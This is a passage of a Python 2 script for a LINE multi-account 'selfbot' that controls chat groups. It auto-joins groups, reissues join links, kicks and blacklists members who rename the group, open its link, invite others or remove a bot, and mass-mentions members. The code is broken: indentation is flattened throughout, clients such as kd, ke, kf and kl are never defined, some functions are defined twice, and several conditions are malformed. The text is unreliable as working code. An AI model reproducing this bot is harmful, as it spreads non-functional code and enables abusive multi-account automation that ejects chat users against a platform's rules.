╠➩ 'af' : 'Afrikaans'
╠➩ 'sq' : 'Albanian'
╠➩ 'ar' : 'Arabic'
╠➩ 'hy' : 'Armenian'
╠➩ 'bn' : 'Bengali'
╠➩ 'ca' : 'Catalan'
╠➩ 'zh' : 'Chinese'
╠➩ 'zhcn' : 'Chinese (Mandarin/China)'
╠➩ 'zhtw' : 'Chinese (Mandarin/Taiwan)'
╠➩ 'zhyue' : 'Chinese (Cantonese)'
╠➩ 'hr' : 'Croatian'
╠➩ 'cs' : 'Czech'
╠➩ 'da' : 'Danish'
╠➩ 'nl' : 'Dutch'
╠➩ 'en' : 'English'
╠➩ 'enau' : 'English (Australia)'
╠➩ 'enuk' : 'English (United Kingdom)'
╠➩ 'enus' : 'English (United States)'
╠➩ 'eo' : 'Esperanto'
╠➩ 'fi' : 'Finnish'
╠➩ 'fr' : 'French'
╠➩ 'de' : 'German'
╠➩ 'el' : 'Greek'
╠➩ 'hi' : 'Hindi'
╠➩ 'hu' : 'Hungarian'
╠➩ 'is' : 'Icelandic'
╠➩ 'id' : 'Indonesian'
╠➩ 'it' : 'Italian'
╠➩ 'jp' : 'Japanese'
╠➩ 'km' : 'Khmer (Cambodian)'
╠➩ 'ko' : 'Korean'
╠➩ 'la' : 'Latin'
╠➩ 'lv' : 'Latvian'
╠➩ 'mk' : 'Macedonian'
╠➩ 'no' : 'Norwegian'
╠➩ 'pl' : 'Polish'
╠➩ 'pt' : 'Portuguese'
╠➩ 'ro' : 'Romanian'
╠➩ 'ru' : 'Russian'
╠➩ 'sr' : 'Serbian'
╠➩ 'si' : 'Sinhala'
╠➩ 'sk' : 'Slovak'
╠➩ 'es' : 'Spanish'
╠➩ 'eses' : 'Spanish (Spain)'
╠➩ 'esus' : 'Spanish (United States)'
╠➩ 'sw' : 'Swahili'
╠➩ 'sv' : 'Swedish'
╠➩ 'ta' : 'Tamil'
╠➩ 'th' : 'Thai'
╠➩ 'tr' : 'Turkish'
╠➩ 'uk' : 'Ukrainian'
╠➩ 'vi' : 'Vietnamese'
╠➩ 'cy' : 'Welsh'
╚═════════════════
"""
KAC=[cl,ki,kk,kc,ks,kt]
mid = cl.getProfile().mid
Amid = ki.getProfile().mid
Bmid = kk.getProfile().mid
Cmid = kc.getProfile().mid
Dmid = ks.getProfile().mid
Emid = kt.getProfile().mid
#Fmid = kl.getProfile().mid
protectname = []
protecturl = []
protection = []
autocancel = {}
autoinvite = []
autoleaveroom = []
targets = []
Bots=[mid,Amid,Bmid,Cmid,Dmid,Emid,"u78e5efff85bf97393cc2c4b8ecf93d25","ub5ae780d74acdd2c05b750ef7fb4ae31","u2355fb85d6b43785e0b7770f956d0347"]
admin = ["u78e5efff85bf97393cc2c4b8ecf93d25","ub5ae780d74acdd2c05b750ef7fb4ae31","u2355fb85d6b43785e0b7770f956d0347"]
owner = ["u78e5efff85bf97393cc2c4b8ecf93d25","ub5ae780d74acdd2c05b750ef7fb4ae31","u2355fb85d6b43785e0b7770f956d0347"]
wait = {
'contact':False,
'autoJoin':True,
'autoCancel':{"on":True, "members":1},
'leaveRoom':False,
'timeline':True,
'autoAdd':False,
'message':"Thanks for add Me",
"lang":"JP",
"comment":"AutoLike by ●▬▬▬▬๑۩A̴M̴I̴I̴ T̴E̴A̴M̴B̴O̴T̴۩๑▬▬▬▬▬●",
"welmsg":"welcome to group",
"commentOn":True,
"commentBlack":{},
"wblack":False,
"dblack":False,
"clock":False,
"status":False,
"likeOn":False,
"pname":False,
"blacklist":{},
"whitelist":{},
"wblacklist":False,
"dblacklist":False,
"qr":False,
"welcomemsg":False,
"Backup":False,
"protectionOn":False,
"winvite":False,
"pnharfbot":{},
"pname":{},
"pro_name":{},
"tag":False,
"autorein":True,
"pelaku":False,
}
wait2 = {
'readPoint':{},
'readMember':{},
'setTime':{},
'ROM':{},
'copy':False,
'target':{},
'midstarget':{},
}
mimic = {
"copy":False,
"copy2":False,
"status":False,
"target":{}
}
res = {
'num':{},
'us':{},
'au':{},
}
setTime = {}
setTime = wait2['setTime']
contact = cl.getProfile()
backup = cl.getProfile()
backup.displayName = contact.displayName
backup.statusMessage = contact.statusMessage
backup.pictureStatus = contact.pictureStatus
contact = ki.getProfile()
backup = ki.getProfile()
backup.displayName = contact.displayName
backup.statusMessage = contact.statusMessage
backup.pictureStatus = contact.pictureStatus
contact = kk.getProfile()
backup = kk.getProfile()
backup.displayName = contact.displayName
backup.statusMessage = contact.statusMessage
backup.pictureStatus = contact.pictureStatus
contact = kc.getProfile()
backup = kc.getProfile()
backup.displayName = contact.displayName
backup.statusMessage = contact.statusMessage
backup.pictureStatus = contact.pictureStatus
contact = ks.getProfile()
backup = ks.getProfile()
backup.displayName = contact.displayName
backup.statusMessage = contact.statusMessage
backup.pictureStatus = contact.pictureStatus
contact = kt.getProfile()
backup = kt.getProfile()
backup.displayName = contact.displayName
backup.statusMessage = contact.statusMessage
backup.pictureStatus = contact.pictureStatus
def cms(string, commands): #/XXX, >XXX, ;XXX, ^XXX, %XXX, $XXX...
tex = ["+","@","/",">",";","^","%","$","^","サテラ:","サテラ:","サテラ:","サテラ:"]
for texX in tex:
for command in commands:
# match the command with any of the accepted prefixes, as the comment above implies
if string == texX + command:
return True
return False
def upload_tempimage(client):
'''
Upload a picture of a kitten. We don't ship one, so get creative!
'''
config = {
'album': album,
'name': 'bot auto upload',
'title': 'bot auto upload',
'description': 'bot auto upload'
}
print("Uploading image... ")
image = client.upload_from_path(image_path, config=config, anon=False)
print("Done")
print()
def restart_program():
python = sys.executable
os.execl(python, python, * sys.argv)
def waktu(secs):
mins, secs = divmod(secs,60)
hours, mins = divmod(mins,60)
return '%02d hour %02d minute %02d seconds' % (hours, mins, secs)
def download_page(url):
version = (3,0)
cur_version = sys.version_info
if cur_version >= version: #If the Current Version of Python is 3.0 or above
import urllib.request #urllib library for extracting web pages
try:
headers = {}
headers['User-Agent'] = "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36"
req = urllib.request.Request(url, headers = headers)
resp = urllib.request.urlopen(req)
respData = str(resp.read())
return respData
except Exception as e:
print(str(e))
else: #If the Current Version of Python is 2.x
import urllib2
try:
headers = {}
headers['User-Agent'] = "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.27 Safari/537.17"
req = urllib2.Request(url, headers = headers)
response = urllib2.urlopen(req)
page = response.read()
return page
except:
return"Page Not found"
#Finding 'Next Image' from the given raw page
def _images_get_next_item(s):
start_line = s.find('rg_di')
if start_line == -1: #If no links are found then give an error!
end_quote = 0
link = "no_links"
return link, end_quote
else:
start_line = s.find('"class="rg_meta"')
start_content = s.find('"ou"',start_line+90)
end_content = s.find(',"ow"',start_content-90)
content_raw = str(s[start_content+6:end_content-1])
return content_raw, end_content
#Getting all links with the help of '_images_get_next_image'
def _images_get_all_items(page):
items = []
while True:
item, end_content = _images_get_next_item(page)
if item == "no_links":
break
else:
items.append(item) #Append all the links in the list named 'Links'
time.sleep(0.1) #Timer could be used to slow down the request for image downloads
page = page[end_content:]
return items
def summon(to, nama):
aa = ""
bb = ""
strt = int(14)
akh = int(14)
nm = nama
for mm in nm:
akh = akh + 2
aa += """{"S":"""+json.dumps(str(strt))+""","E":"""+json.dumps(str(akh))+""","M":"""+json.dumps(mm)+"},"""
strt = strt + 6
akh = akh + 4
bb += "\xe2\x95\xa0 @x \n"
aa = (aa[:int(len(aa)-1)])
msg = Message()
msg.to = to
msg.text = "\xe2\x95\x94\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\n"+bb+"\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90"
msg.contentMetadata ={'MENTION':'{"MENTIONEES":['+aa+']}','EMTVER':'4'}
print "Mention"
try:
cl.sendMessage(msg)
except Exception as error:
print error
def yt(query):
with requests.session() as s:
isi = []
if query == "":
query = "S1B tanysyz"
s.headers['user-agent'] = 'Mozilla/5.0'
url = 'http://www.youtube.com/results'
params = {'search_query': query}
r = s.get(url, params=params)
soup = BeautifulSoup(r.content, 'html5lib')
for a in soup.select('.yt-lockup-title > a[title]'):
if '&list=' not in a['href']:
if 'watch?v' in a['href']:
b = a['href'].replace('watch?v=', '')
isi += ['youtu.be' + b]
return isi
def sendMessage(to, text, contentMetadata={}, contentType=0):
mes = Message()
mes.to, mes.from_ = to, profile.mid
mes.text = text
mes.contentType, mes.contentMetadata = contentType, contentMetadata
if to not in messageReq:
messageReq[to] = -1
messageReq[to] += 1
def sendMessage(self, messageObject):
return self.Talk.client.sendMessage(0,messageObject)
def sendText(self, Tomid, text):
msg = Message()
msg.to = Tomid
msg.text = text
return self.Talk.client.sendMessage(0, msg)
def sendImage(self, to_, path):
M = Message(to=to_,contentType = 1)
M.contentMetadata = None
M.contentPreview = None
M_id = self._client.sendMessage(M).id
files = {
'file': open(path, 'rb'),
}
params = {
'name': 'media',
'oid': M_id,
'size': len(open(path, 'rb').read()),
'type': 'image',
'ver': '1.0',
}
data = {
'params': json.dumps(params)
}
r = self._client.post_content('https://os.line.naver.jp/talk/m/upload.nhn', data=data, files=files)
if r.status_code != 201:
raise Exception('Upload image failure.')
#r.content
return True
def sendImageWithURL(self, to_, url):
path = '%s/pythonLine-%i.data' % (tempfile.gettempdir(), randint(0, 9))
r = requests.get(url, stream=True)
if r.status_code == 200:
with open(path, 'w') as f:
shutil.copyfileobj(r.raw, f)
else:
raise Exception('Download image failure.')
try:
self.sendImage(to_, path)
except Exception as e:
raise e
def sendText(self, Tomid, text):
msg = Message()
msg.to = Tomid
msg.text = text
def sendMessage(self, messageObject):
return self.Talk.client.sendMessage(0,messageObject)
def post_content(self, urls, data=None, files=None):
return self._session.post(urls, headers=self._headers, data=data, files=files)
def NOTIFIED_READ_MESSAGE(op):
print op
try:
if op.param1 in wait2['readPoint']:
Name = cl.getContact(op.param2).displayName
if Name in wait2['readMember'][op.param1]:
pass
else:
wait2['readMember'][op.param1] += "\n・" + Name + datetime.now().strftime(' [%d - %H:%M:%S]')
wait2['ROM'][op.param1][op.param2] = "・" + Name + " ツ"
else:
pass
except:
pass
def RECEIVE_MESSAGE(op):
msg = op.message
try:
if msg.contentType == 0:
try:
if msg.to in wait2['readPoint']:
if msg.from_ in wait2["ROM"][msg.to]:
del wait2["ROM"][msg.to][msg.from_]
else:
pass
except:
pass
else:
pass
except KeyboardInterrupt:
sys.exit(0)
except Exception as error:
print error
print ("\n\nRECEIVE_MESSAGE\n\n")
return
def bot(op):
try:
if op.type == 0:
return
if op.type == 5:
if wait["autoAdd"] == True:
cl.findAndAddContactsByMid(op.param1)
if (wait["message"] in [""," ","\n",None]):
pass
else:
cl.sendText(op.param1,str(wait["message"]))
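        # op.type 11: group info changed - if this group's name is protected,
        # restore the saved name and kick whoever changed it.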
if op.type == 11:
if op.param3 == '1':
if op.param1 in wait['pname']:
try:
G = cl.getGroup(op.param1)
except:
try:
G = ki.getGroup(op.param1)
except:
try:
G = kk.getGroup(op.param1)
except:
try:
G = kc.getGroup(op.param1)
except:
try:
G = ks.getGroup(op.param1)
except:
try:
G = kt.getGroup(op.param1)
except:
pass
G.name = wait['pro_name'][op.param1]
try:
cl.updateGroup(G)
except:
try:
ki.updateGroup(G)
except:
try:
kk.updateGroup(G)
except:
try:
kc.updateGroup(G)
except:
try:
ks.updateGroup(G)
except:
try:
kt.updateGroup(G)
except:
pass
if op.param2 in ken:
pass
else:
try:
ki.kickoutFromGroup(op.param1,[op.param2])
except:
try:
kk.kickoutFromGroup(op.param1,[op.param2])
except:
try:
kc.kickoutFromGroup(op.param1,[op.param2])
except:
try:
ks.kickoutFromGroup(op.param1,[op.param2])
except:
try:
kt.kickoutFromGroup(op.param1,[op.param2])
except:
pass
kk.sendText(op.param1,"please do not change group name-_-")
c = Message(to=op.param1, from_=None, text=None, contentType=13)
c.contentMetadata={'mid':op.param2}
cl.sendMessage(c)
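        # op.type 13: a bot account was invited by another bot - the inviter briefly
        # opens the group link, the invitee joins via a reissued ticket, then the link is closed.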
if op.type == 13:
if op.param3 in mid:
if op.param2 in Amid:
G = ki.getGroup(op.param1)
G.preventJoinByTicket = False
ki.updateGroup(G)
Ticket = ki.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki.updateGroup(G)
Ticket = ki.reissueGroupTicket(op.param1)
if op.param3 in Amid:
if op.param2 in Bmid:
X = kk.getGroup(op.param1)
X.preventJoinByTicket = False
kk.updateGroup(X)
Ti = kk.reissueGroupTicket(op.param1)
                    ki.acceptGroupInvitationByTicket(op.param1,Ti)
X.preventJoinByTicket = True
kk.updateGroup(X)
Ti = kk.reissueGroupTicket(op.param1)
if op.param3 in Bmid:
if op.param2 in Cmid:
X = kc.getGroup(op.param1)
X.preventJoinByTicket = False
kc.updateGroup(X)
Ti = kc.reissueGroupTicket(op.param1)
                    kk.acceptGroupInvitationByTicket(op.param1,Ti)
X.preventJoinByTicket = True
kc.updateGroup(X)
Ti = kc.reissueGroupTicket(op.param1)
if op.param3 in Cmid:
if op.param2 in Dmid:
X = kd.getGroup(op.param1)
X.preventJoinByTicket = False
kd.updateGroup(X)
Ti = kd.reissueGroupTicket(op.param1)
                    kc.acceptGroupInvitationByTicket(op.param1,Ti)
X.preventJoinByTicket = True
kd.updateGroup(X)
Ti = kd.reissueGroupTicket(op.param1)
if op.param3 in Dmid:
if op.param2 in Emid:
X = ke.getGroup(op.param1)
X.preventJoinByTicket = False
ke.updateGroup(X)
Ti = ke.reissueGroupTicket(op.param1)
                    kd.acceptGroupInvitationByTicket(op.param1,Ti)
X.preventJoinByTicket = True
ke.updateGroup(X)
Ti = ke.reissueGroupTicket(op.param1)
if op.param3 in Emid:
if op.param2 in mid:
X = kf.getGroup(op.param1)
X.preventJoinByTicket = False
kf.updateGroup(X)
Ti = kf.reissueGroupTicket(op.param1)
                    ke.acceptGroupInvitationByTicket(op.param1,Ti)
X.preventJoinByTicket = True
kf.updateGroup(X)
Ti = kf.reissueGroupTicket(op.param1)
#=====================================================================================
if op.param3 in mid:
if op.param2 in Bmid:
X = kk.getGroup(op.param1)
X.preventJoinByTicket = False
kk.updateGroup(X)
Ti = kk.reissueGroupTicket(op.param1)
                    cl.acceptGroupInvitationByTicket(op.param1,Ti)
X.preventJoinByTicket = True
kk.updateGroup(X)
Ti = kk.reissueGroupTicket(op.param1)
if op.param3 in mid:
if op.param2 in Cmid:
X = kc.getGroup(op.param1)
X.preventJoinByTicket = False
kc.updateGroup(X)
Ti = kc.reissueGroupTicket(op.param1)
                    cl.acceptGroupInvitationByTicket(op.param1,Ti)
X.preventJoinByTicket = True
kc.updateGroup(X)
Ti = kc.reissueGroupTicket(op.param1)
if op.param3 in mid:
if op.param2 in Dmid:
X = ks.getGroup(op.param1)
X.preventJoinByTicket = False
ks.updateGroup(X)
Ti = ks.reissueGroupTicket(op.param1)
                    cl.acceptGroupInvitationByTicket(op.param1,Ti)
X.preventJoinByTicket = True
ks.updateGroup(X)
Ti = ks.reissueGroupTicket(op.param1)
if op.param3 in mid:
if op.param2 in Emid:
X = kt.getGroup(op.param1)
X.preventJoinByTicket = False
kt.updateGroup(X)
Ti = kt.reissueGroupTicket(op.param1)
                    cl.acceptGroupInvitationByTicket(op.param1,Ti)
X.preventJoinByTicket = True
kt.updateGroup(X)
Ti = kt.reissueGroupTicket(op.param1)
#======================================================
if op.param3 in Bmid:
if op.param2 in mid:
G = cl.getGroup(op.param1)
G.preventJoinByTicket = False
cl.updateGroup(G)
Ticket = cl.reissueGroupTicket(op.param1)
kk.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
cl.updateGroup(G)
Ticket = cl.reissueGroupTicket(op.param1)
if op.param3 in Bmid:
if op.param2 in Cmid:
G = kc.getGroup(op.param1)
G.preventJoinByTicket = False
kc.updateGroup(G)
Ticket = kc.reissueGroupTicket(op.param1)
kk.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
kc.updateGroup(G)
Ticket = kc.reissueGroupTicket(op.param1)
if op.param3 in Bmid:
if op.param2 in Dmid:
G = ks.getGroup(op.param1)
G.preventJoinByTicket = False
ks.updateGroup(G)
Ticket = ks.reissueGroupTicket(op.param1)
kk.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ks.updateGroup(G)
Ticket = ks.reissueGroupTicket(op.param1)
if op.param3 in Bmid:
if op.param2 in Emid:
G = kt.getGroup(op.param1)
G.preventJoinByTicket = False
kt.updateGroup(G)
Ticket = kt.reissueGroupTicket(op.param1)
kk.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
kt.updateGroup(G)
Ticket = kt.reissueGroupTicket(op.param1)
#=========================================================================
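        # op.type 15: a member left the group - automatically re-invite admins when autorein is on.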
if op.type == 15:
if wait["autorein"] == True:
if op.param2 in admin:
klist=[ki,kk,kc,ks,kt]
kicker = random.choice(klist)
kicker.inviteIntoGroup(op.param1,[op.param2])
#===========================================
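        # op.type 32: a member was removed by force - with protection on, kick the remover
        # and re-invite the removed member.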
if op.type == 32:
if not op.param2 in Bots and admin:
if wait["protectionOn"] == True:
try:
klist=[ki,kk,kc,ks,kt]
kicker = random.choice(klist)
G = kicker.getGroup(op.param1)
kicker.kickoutFromGroup(op.param1,[op.param2])
kicker.inviteIntoGroup(op.param1, [op.param3])
except Exception, e:
print e
if op.type == 13:
if mid in op.param3:
G = cl.getGroup(op.param1)
if wait["autoJoin"] == True:
if wait["autoCancel"]["on"] == True:
if len(G.members) <= wait["autoCancel"]["members"]:
cl.rejectGroupInvitation(op.param1)
else:
cl.acceptGroupInvitation(op.param1)
else:
cl.acceptGroupInvitation(op.param1)
elif wait["autoCancel"]["on"] == True:
if len(G.members) <= wait["autoCancel"]["members"]:
cl.rejectGroupInvitation(op.param1)
else:
Inviter = op.param3.replace("",',')
InviterX = Inviter.split(",")
matched_list = []
for tag in wait["blacklist"]:
matched_list+=filter(lambda str: str == tag, InviterX)
if matched_list == []:
pass
else:
cl.cancelGroupInvitation(op.param1, matched_list)
if Amid in op.param3:
G = cl.getGroup(op.param1)
if wait["autoJoin"] == True:
if wait["autoCancel"]["on"] == True:
if len(G.members) <= wait["autoCancel"]["members"]:
ki.rejectGroupInvitation(op.param1)
else:
ki.acceptGroupInvitation(op.param1)
else:
ki.acceptGroupInvitation(op.param1)
elif wait["autoCancel"]["on"] == True:
if len(G.members) <= wait["autoCancel"]["members"]:
ki.rejectGroupInvitation(op.param1)
else:
Inviter = op.param3.replace("",',')
InviterX = Inviter.split(",")
matched_list = []
for tag in wait["blacklist"]:
matched_list+=filter(lambda str: str == tag, InviterX)
if matched_list == []:
pass
else:
ki.cancelGroupInvitation(op.param1, matched_list)
if Bmid in op.param3:
G = cl.getGroup(op.param1)
if wait["autoJoin"] == True:
if wait["autoCancel"]["on"] == True:
if len(G.members) <= wait["autoCancel"]["members"]:
kk.rejectGroupInvitation(op.param1)
else:
kk.acceptGroupInvitation(op.param1)
else:
kk.acceptGroupInvitation(op.param1)
elif wait["autoCancel"]["on"] == True:
if len(G.members) <= wait["autoCancel"]["members"]:
kk.rejectGroupInvitation(op.param1)
else:
Inviter = op.param3.replace("",',')
InviterX = Inviter.split(",")
matched_list = []
for tag in wait["blacklist"]:
matched_list+=filter(lambda str: str == tag, InviterX)
if matched_list == []:
pass
else:
kk.cancelGroupInvitation(op.param1, matched_list)
if Cmid in op.param3:
G = cl.getGroup(op.param1)
if wait["autoJoin"] == True:
if wait["autoCancel"]["on"] == True:
if len(G.members) <= wait["autoCancel"]["members"]:
kc.rejectGroupInvitation(op.param1)
else:
kc.acceptGroupInvitation(op.param1)
else:
kc.acceptGroupInvitation(op.param1)
elif wait["autoCancel"]["on"] == True:
if len(G.members) <= wait["autoCancel"]["members"]:
kc.rejectGroupInvitation(op.param1)
else:
Inviter = op.param3.replace("^^",',')
InviterX = Inviter.split(",")
matched_list = []
for tag in wait["blacklist"]:
matched_list+=filter(lambda str: str == tag, InviterX)
if matched_list == []:
pass
else:
kc.cancelGroupInvitation(op.param1, matched_list)
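        # op.type 17: a member joined - kick blacklisted users and, if enabled, send a welcome message.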
if op.type == 17:
if op.param3 in wait["blacklist"]:
if not op.param2 in Bots and admin:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param3])
                    cl.sendText(op.param1,"blacklisted users are not allowed to join -_-")
c = Message(to=op.param1, from_=None, text=None, contentType=13)
c.contentMetadata={'mid':op.param3}
cl.sendMessage(c)
if op.type == 17:
if wait["welcomemsg"] == True:
if op.param2 not in Bots:
ginfo = cl.getGroup(op.param1)
cl.sendText(op.param1,cl.getContact(op.param2).displayName + wait["welmsg"]+ str(ginfo.name))
if op.type == 11:
if not op.param2 in Bots:
if wait["qr"] == True:
try:
klist=[ki,kk,kc,ks,kt]
kicker = random.choice(klist)
G = kicker.getGroup(op.param1)
G.preventJoinByTicket = True
kicker.updateGroup(G)
except Exception, e:
print e
if op.type == 11:
if not op.param2 in Bots and admin:
if wait["protectionOn"] == True:
try:
klist=[ki,kk,kc,ks,kt]
kicker = random.choice(klist)
G = kicker.getGroup(op.param1)
G.preventJoinByTicket = True
kicker.updateGroup(G)
kicker.kickoutFromGroup(op.param1,[op.param2])
G.preventJoinByTicket = True
kicker.updateGroup(G)
                    cl.sendText(op.param1,"please do not open the group link -_-")
c = Message(to=op.param1, from_=None, text=None, contentType=13)
c.contentMetadata={'mid':op.param2}
cl.sendMessage(c)
except Exception, e:
print e
if op.type == 13:
G = cl.getGroup(op.param1)
I = G.creator
if not op.param2 in Bots and admin:
if wait["protectionOn"] == True:
klist=[ki,kk,kc,ks,kt]
kicker = random.choice(klist)
G = kicker.getGroup(op.param1)
if G is not None:
gInviMids = [contact.mid for contact in G.invitee]
kicker.cancelGroupInvitation(op.param1, gInviMids)
kicker.kickoutFromGroup(op.param1,[op.param2])
cl.sendText(op.param1,"you are prohibited from inviting-_-")
c = Message(to=op.param1, from_=None, text=None, contentType=13)
c.contentMetadata={'mid':op.param2}
cl.sendMessage(c)
if op.type == 11:
if wait["pelaku"] == True:
c = Message(to=op.param1, from_=None, text=None, contentType=13)
c.contentMetadata={'mid':op.param2}
cl.sendMessage(c)
if op.type == 13:
if wait["pelaku"] == True:
c = Message(to=op.param1, from_=None, text=None, contentType=13)
c.contentMetadata={'mid':op.param2}
cl.sendMessage(c)
if op.type == 19:
if wait["pelaku"] == True:
c = Message(to=op.param1, from_=None, text=None, contentType=13)
c.contentMetadata={'mid':op.param2}
cl.sendMessage(c)
                print "showing the perpetrator"
if op.type == 15:
if op.param2 in admin:
random.choice(KAC).inviteIntoGroup(op.param1,[op.param2])
if op.type == 19:
if op.param2 in Bots:
if op.param3 in admin:
random.choice(KAC).inviteIntoGroup(op.param1, [op.param3])
if op.type == 19:
if not op.param2 in Bots:
if op.param3 in admin:
random.choice(KAC).inviteIntoGroup(op.param1, [op.param3])
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
if op.type == 19:
if not op.param2 in Bots:
try:
gs = ki.getGroup(op.param1)
gs = kk.getGroup(op.param1)
targets = [op.param2]
for target in targets:
try:
wait["blacklist"][target] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
except:
pass
except Exception, e:
print e
if not op.param2 in Bots and admin:
if wait["Backup"] == True:
try:
random.choice(KAC).inviteIntoGroup(op.param1, [op.param3])
except Exception, e:
print e
if not op.param2 in Bots and admin:
if wait["protectionOn"] == True:
try:
klist=[ki,kk,kc,ks,kt]
kicker = random.choice(klist)
G = kicker.getGroup(op.param1)
G.preventJoinByTicket = False
kicker.updateGroup(G)
invsend = 0
Ticket = kicker.reissueGroupTicket(op.param1)
kl.acceptGroupInvitationByTicket(op.param1,Ticket)
time.sleep(0.2)
X = kicker.getGroup(op.param1)
X.preventJoinByTicket = True
kl.kickoutFromGroup(op.param1,[op.param2])
kicker.kickoutFromGroup(op.param1,[op.param2])
kl.leaveGroup(op.param1)
kicker.updateGroup(X)
except Exception, e:
print e
if not op.param2 in Bots and admin:
try:
gs = ki.getGroup(op.param1)
gs = kk.getGroup(op.param1)
targets = [op.param2]
for target in targets:
try:
wait["blacklist"][target] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
except:
pass
except Exception, e:
print e
if not op.param2 in Bots and admin:
if wait["Backup"] == True:
try:
random.choice(KAC).inviteIntoGroup(op.param1, [op.param3])
except Exception, e:
print e
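        # op.type 19: a member was kicked - if the target was one of the bot accounts,
        # kick the attacker, blacklist them, and let all bot accounts rejoin through a reissued ticket.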
if op.type == 19:
if mid in op.param3:
if op.param2 in Bots:
pass
try:
ki.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
                        print ("Could not kick ["+op.param2+"] from group ["+op.param1+"] because of a kick restriction or because the client is not in the group. Adding to blacklist.")
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
G = ki.getGroup(op.param1)
G.preventJoinByTicket = False
ki.updateGroup(G)
Ti = ki.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
ki.acceptGroupInvitationByTicket(op.param1,Ti)
kk.acceptGroupInvitationByTicket(op.param1,Ti)
kc.acceptGroupInvitationByTicket(op.param1,Ti)
ks.acceptGroupInvitationByTicket(op.param1,Ti)
kt.acceptGroupInvitationByTicket(op.param1,Ti)
X = cl.getGroup(op.param1)
X.preventJoinByTicket = True
cl.updateGroup(X)
Ti = cl.reissueGroupTicket(op.param1)
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
if Amid in op.param3:
if op.param2 in Bots:
pass
try:
kk.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
                        print ("Could not kick ["+op.param2+"] from group ["+op.param1+"] because of a kick restriction or because the client is not in the group. Adding to blacklist.")
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
X = kk.getGroup(op.param1)
X.preventJoinByTicket = False
kk.updateGroup(X)
Ti = kk.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
ki.acceptGroupInvitationByTicket(op.param1,Ti)
kk.acceptGroupInvitationByTicket(op.param1,Ti)
kc.acceptGroupInvitationByTicket(op.param1,Ti)
ks.acceptGroupInvitationByTicket(op.param1,Ti)
kt.acceptGroupInvitationByTicket(op.param1,Ti)
X = ki.getGroup(op.param1)
X.preventJoinByTicket = True
ki.updateGroup(X)
Ticket = ki.reissueGroupTicket(op.param1)
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
if Bmid in op.param3:
if op.param2 in Bots:
pass
try:
kc.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
                        print ("Could not kick ["+op.param2+"] from group ["+op.param1+"] because of a kick restriction or because the client is not in the group. Adding to blacklist.")
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
X = kc.getGroup(op.param1)
X.preventJoinByTicket = False
kc.updateGroup(X)
Ti = kc.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
ki.acceptGroupInvitationByTicket(op.param1,Ti)
kk.acceptGroupInvitationByTicket(op.param1,Ti)
kc.acceptGroupInvitationByTicket(op.param1,Ti)
ks.acceptGroupInvitationByTicket(op.param1,Ti)
kt.acceptGroupInvitationByTicket(op.param1,Ti)
X = kk.getGroup(op.param1)
X.preventJoinByTicket = True
kk.updateGroup(X)
Ticket = kk.reissueGroupTicket(op.param1)
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
if Cmid in op.param3:
if op.param2 in Bots:
pass
try:
kd.kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
                        print ("Could not kick ["+op.param2+"] from group ["+op.param1+"] because of a kick restriction or because the client is not in the group. Adding to blacklist.")
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
X = kd.getGroup(op.param1)
X.preventJoinByTicket = False
kd.updateGroup(X)
Ti = kd.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
ki.acceptGroupInvitationByTicket(op.param1,Ti)
kk.acceptGroupInvitationByTicket(op.param1,Ti)
kc.acceptGroupInvitationByTicket(op.param1,Ti)
ks.acceptGroupInvitationByTicket(op.param1,Ti)
kt.acceptGroupInvitationByTicket(op.param1,Ti)
X = kc.getGroup(op.param1)
X.preventJoinByTicket = True
kc.updateGroup(X)
Ticket = kc.reissueGroupTicket(op.param1)
if op.param2 in wait["blacklist"]:
pass
if op.param2 in wait["whitelist"]:
pass
else:
wait["blacklist"][op.param2] = True
if Dmid in op.param3:
if op.param2 in Bots:
pass
try:
